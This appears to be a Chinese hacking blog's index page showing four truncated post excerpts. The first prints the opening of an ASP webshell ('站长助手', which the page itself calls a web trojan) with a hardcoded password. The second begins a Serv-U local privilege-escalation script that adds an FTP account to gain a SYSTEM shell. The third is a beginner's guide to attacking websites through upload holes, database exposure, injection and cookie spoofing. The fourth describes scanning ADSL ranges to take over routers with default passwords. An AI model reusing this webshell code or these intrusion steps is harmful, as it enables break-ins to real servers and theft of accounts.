博文
ASP站长助手源代码(2010-08-23 21:51:00)
摘要: <%
Server.ScriptTimeout=50000
Response.Buffer = True
On Error Resume Next
ApplicationName = "站长助手6 增强版"
UserPass = "123456" '登陆密码
URL = Request.ServerVariables("URL")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
Action = Request("Action")
RootPath = Server.MapPath(".")
WWWRoot = Server.MapPath("/")
FolderPath = Request("FolderPath")
FName = Request("FName")
BackUrl = "<meta http-equiv='refresh' content='2;URL=?Action=ShowFile'>"
If Session("webadmin")<>UserPass Then
If Request.Form("Pass")<>"" Then
If Request.Form("Pass")=UserPass Then
Session("webadmin")=UserPass
Response.Redi......
分享serv-u利用脚本(asp aspx php)(2010-08-23 21:47:00)
摘要:下面代码保留为servu.asp即可,应用了xml组件,树立一个lake 密码为admin123的可履行ftp帐号
<title>Serv-U 2 admin by lake2</title>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
</style>
<p>Serv-U Local Get SYSTEM Shell with ASP
</p>
<p>Author: lake2, <a http://lake2.0x54.org/" target=_blank>http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a></p>
<form name="form1" method="post" action="">
<p>user:
......
黑客初步接触之网站的入侵检测 (2006-10-08 21:00:00)
摘要:
黑客初步接触之网站的入侵检测
作者:admin 文章来源:www.520hack.com 点击数:
98 更新时间:2006-10-8
首先介绍下什么样的站点可以入侵:必须是动态的网站,比如:asp、php、jsp,这种形式的站点,后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)。
入侵介绍:1.上传漏洞;2.暴库;3.注入;4.旁注;5.COOKIE诈骗。
1:上传漏洞 这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示“上传格式不正确[重新上传]”这样的字样不成就是有长传漏洞了,找个可以上传的工具直接可以得到WEBSHELL。
工具介绍:
上传工具 老兵的上传工具,DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。
WEBSHELL是什么:其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马,海阳2006也是WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2。暴库 这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径。用迅雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp......
远程盗取ADSL帐号很简单(2006-06-16 09:46:00)
摘要:
震惊!远程盗取ADSL帐号很简单(图)
ADSL作为一种宽带接入方式已经被广大用户接受,现在一些用户家里有很多台电脑,通过一台ADSL路由器拨号上网,这样充分利用了带宽,对于家中有多台电脑需共享上网的用户来说,一般可通过建立和配置代理服务器来实现共享上网,缺点是主机必须开着才能实现共享;另外一种有效的方法是使用路由器来实现共享,这样每个客户端都能独立上网,不足之处是要添置昂贵的路由设备。其实有些ADSL MODEM本身就带有路由功能,只要用户能够正确配置相关参数就可以路由共享,根本不需要外添设备。
国内ADSL服务提供商所提供的调制解调器大部分都内置了路由功能,不过由于技术上的原因,少量ADSL调制解调器虽然在硬件上设计了路由功能,但调制解调器随机软件并不能支持在PPPoE虚拟拨号接入方式下使用该功能,只有拥有固定IP地址的专线用户才可以使用路由功能,或者需要服务商局端设备同为该品牌的产品才能够支持在PPPoE接入方式下使用,这时需要升级调制解调器的软件后才可以使用内置的路由功能。不同路由器的配置方法不同,这类主题的帖子网上有很多,我们在这里主要介绍那些使用路由拨号上网的用户,需要注意的安全问题。
最常见的安全问题就是用户没有修改路由器的配置密码,一般的路由器在出场的时候夺回有一个默认的配置密码。只有知道这个密码,用户才能对路由器的进行配置。很多用户在配置自己的路由器之后,并没有修改这个密码。导致网上一些不法之徒可以控制路由器,从而盗窃用户的ADSL账号。这些不法之徒是如何做的呢,我们下面来把他们的手法一一曝光。
扫描ADSL在线用户 寻找攻击目标
扫描ADSL上网用户的IP段,获取开放80端口的主机列表
这些用户首先拨通自己家的ADSL,然后用ipconfig命令查看自己的Ip,如下图所示:
在开始->运行->输入cmd,在出现的dos窗口中输入ipconfig即可看到:
一般北京的ADSL上网的用户多为61.49.*.*。获得了自己的IP段之后,就可以找一个好的端口扫描工具了。新在端口扫描工具有很多,其中支持多线程、体积小、速度快的首推superscan。我们这里就使用它作为示范工具。Sup......